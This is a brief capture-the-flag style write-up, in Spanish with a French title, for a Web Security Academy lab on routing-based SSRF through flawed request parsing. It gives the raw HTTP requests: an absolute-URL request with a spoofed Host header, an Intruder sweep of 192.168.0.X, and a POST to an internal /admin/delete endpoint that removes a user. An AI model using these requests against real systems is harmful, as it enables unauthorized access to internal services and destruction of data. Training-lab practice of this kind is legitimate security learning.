SSRF via parsing incorrect de la requête

SSRF via flawed request parsing

Lab: SSRF via flawed request parsing | Web Security AcademyWebSecAcademy

This lab is vulnerable to routing-based SSRF due to its flawed parsing of the request's intended host. You can exploit this to access an insecure intranet admin panel located at an internal IP address.

To solve the lab, access the internal admin panel located in the 192.168.0.0/24 range, then delete the user carlos.

si intento cambiar el host me pone forbidden

Host: jord4n.pro

podemos hacer que el valor host no lo tome en cuenta vamos a poner

GET https://0a4600ce03a5ed7982aa3e3c00050023.web-security-academy.net/ HTTP/2

Host: test.com

ahora me sale el mensaje de errro

<h1>
    Server Error: Gateway Timeout (3) connecting to test.com
</h1>

vamos a lanzar un attaque al intruder

GET https://0a4600ce03a5ed7982aa3e3c00050023.web-security-academy.net/ HTTP/2

Host: 192.168.0.X

me detecta la ip 192.168.0.92 con el codigo de estado 302

POST https://0a4600ce03a5ed7982aa3e3c00050023.web-security-academy.net/admin/delete HTTP/2

Host: 192.168.0.92

csrf=Rrh5bY7GRvuOjDW1nTUWrIjaqAdlTvtW&username=carlos

y borramos al user carlos

Mis à jour il y a 2 mois

hashtagSSRF via flawed request parsing

SSRF via flawed request parsing